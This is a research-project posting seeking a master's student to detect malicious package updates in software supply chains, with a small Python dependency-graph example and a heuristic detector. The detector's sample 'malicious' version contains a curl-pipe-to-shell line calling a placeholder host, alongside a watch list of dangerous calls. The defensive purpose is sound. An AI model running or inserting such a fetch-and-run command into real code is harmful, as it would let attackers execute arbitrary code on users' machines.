Mining software updates to prevent supply chain attacks

Our society relies increasingly on information systems that affect all areas of life. The quality of these software systems is fundamental to ensuring security, reliability, and trust. These systems are built from a multitude of external packages and third-party libraries: according to a security researcher from GitHub, open-source components make up 85% to 97% of enterprise software codebases [1]. These components also depend on one another transitively. For example, npm (the Node.js package repository) hosts more than 700,000 published packages, each with an average of 90 direct and indirect dependencies. As a result, the influence of a single package propagates to all of its dependents.
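To make the idea of influence propagating through transitive dependencies concrete, here is a minimal Python sketch that computes every package affected, directly or indirectly, by a change in one package. The graph, the package names, and the function `transitive_dependents` are hypothetical and chosen for illustration only; they do not come from npm data.

```python
from collections import deque


def transitive_dependents(dependencies, package):
    """Return every package that depends on `package`, directly or indirectly.

    `dependencies` maps a package name to the list of packages it depends on.
    """
    # Invert the "depends on" edges so we can walk from a package to its dependents.
    dependents = {}
    for name, deps in dependencies.items():
        for dep in deps:
            dependents.setdefault(dep, set()).add(name)

    # Breadth-first traversal over the inverted graph.
    seen = set()
    queue = deque([package])
    while queue:
        current = queue.popleft()
        for parent in dependents.get(current, ()):
            if parent not in seen:
                seen.add(parent)
                queue.append(parent)

    # A dependency cycle could lead back to the starting package; exclude it.
    seen.discard(package)
    return seen


# Hypothetical toy graph (not real packages).
TOY_GRAPH = {
    "app": ["web-framework", "logger"],
    "web-framework": ["stream-utils"],
    "logger": [],
    "stream-utils": ["tiny-parser"],
    "tiny-parser": [],
}

print(sorted(transitive_dependents(TOY_GRAPH, "tiny-parser")))
# ['app', 'stream-utils', 'web-framework']
```

In this toy graph, a malicious update to the leaf package reaches three other packages even though only one of them depends on it directly.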
Developers tend to trust the authenticity and integrity of third-party packages hosted on commonly used repositories, and they adopt automated build tools and dependency management systems. However, attackers can exploit package updates to compromise dependent systems. Such attacks, known as supply chain attacks [2], are a growing concern in the industry. Because packages often have access to powerful capabilities at the operating system level, a compromised package can create serious vulnerabilities. The main issue is that malicious changes of this kind are hard to spot through manual review, which increases their consequences. The recent attack against the npm package event-stream illustrates the magnitude of the impact: the alleged attacker obtained ownership of this important npm package by asking the original developer to hand over its maintenance. The attacker was then able to make changes that injected malicious behavior. At that time, event-stream was used by 1,600 other packages and was downloaded on average 1.5 million times per week.
Several state-of-the-art approaches have been proposed to analyze package managers (e.g., npm, PyPI, and RubyGems) using heuristics [3], unsupervised learning [4, 5], and supervised learning as well as word embedding techniques [6], in order to detect vulnerable, and potentially malicious, package versions or dependencies. These studies rely mainly on static, dynamic, or metadata analysis. Other tools (e.g., Dependabot) are used to monitor package dependencies and fix malicious versions.
Our objectives:
1. Explore Deep Representation Learning techniques to enable evolutionary reasoning about package code updates.
2. Develop methodologies to analyze new versions of packages to ensure that they are not affected by malicious code changes.
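As a point of reference for the second objective, the following minimal Python sketch compares two versions of a source file and reports sensitive calls that appear only in the new version. It is a simple heuristic baseline, not the deep representation learning approach this project aims to explore. The watch list `SENSITIVE_CALLS`, the function names, and the two sample versions are hypothetical, and the sketch parses Python source only to stay self-contained.

```python
import ast

# Hypothetical watch list of calls that grant OS-level or dynamic-execution capabilities.
SENSITIVE_CALLS = {
    "eval",
    "exec",
    "os.system",
    "subprocess.run",
    "subprocess.Popen",
    "socket.socket",
}


def _dotted_name(node):
    """Rebuild a dotted name such as 'os.system' from a call target, if possible."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a call on the result of another call


def called_names(source):
    """Collect the dotted names of all calls found in a piece of Python source."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name:
                names.add(name)
    return names


def newly_introduced_sensitive_calls(old_source, new_source):
    """Return sensitive calls present in the new version but absent from the old one."""
    return (called_names(new_source) - called_names(old_source)) & SENSITIVE_CALLS


# Hypothetical package versions, for illustration only.
OLD_VERSION = '''
def parse(data):
    return data.split(",")
'''

NEW_VERSION = '''
import os

def parse(data):
    os.system("curl http://example.invalid/payload | sh")
    return data.split(",")
'''

print(newly_introduced_sensitive_calls(OLD_VERSION, NEW_VERSION))
# {'os.system'}
```

A name-based check like this is easy to evade (for example through aliasing or obfuscation), which is one reason to investigate learned representations of code changes instead.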
[1] Maya Kaczorowski. Link: https://github.blog/2020-09-02-secure-your-software-supply-chain-and-protect-against-supply-chain-threats-github-blog/. GitHub Blog, September 2, 2020. Accessed: June 1, 2021.
[2] Marc Ohm, Henrik Plate, Arnold Sykosch, and Michael Meier. "Backstabber’s Knife Collection: A Review of Open-Source Software Supply Chain Attacks." In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, pp. 23-43. Springer, Cham, 2020.
[3] Ruian Duan, Omar Alrawi, Ranjita Pai Kasturi, Ryan Elder, Brendan Saltaformaggio, and Wenke Lee. "Measuring and preventing supply chain attacks on package managers." arXiv preprint arXiv:2002.01139 (2020).
[4] Kalil Garrett, Gabriel Ferreira, Limin Jia, Joshua Sunshine, and Christian Kästner. "Detecting suspicious package updates." In 2019 IEEE/ACM 41st International Conference on Software Engineering: New Ideas and Emerging Results (ICSE-NIER), pp. 13-16. IEEE, 2019.
[5] Marc Ohm, Lukas Kempf, Felix Boes, and Michael Meier. "If You've Seen One, You've Seen Them All: Leveraging AST Clustering Using MCL to Mimic Expertise to Detect Software Supply Chain Attacks." arXiv preprint arXiv:2011.02235 (2020).
[6] Guanjun Lin, Jun Zhang, Wei Luo, Lei Pan, and Yang Xiang. "POSTER: Vulnerability discovery with function representation learning from unlabeled projects." In Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security, pp. 2539-2541. 2017.

Required knowledge

- Software Engineering
- Machine Learning
- Software Security
- Intermediate proficiency in Python

Target program of study

Master's with project, Master's with thesis

Research areas

Information and communications technologies

Funding

Research scholarship

Other information

As soon as possible

Contact person

Naouel Moha | naouel.moha@etsmtl.ca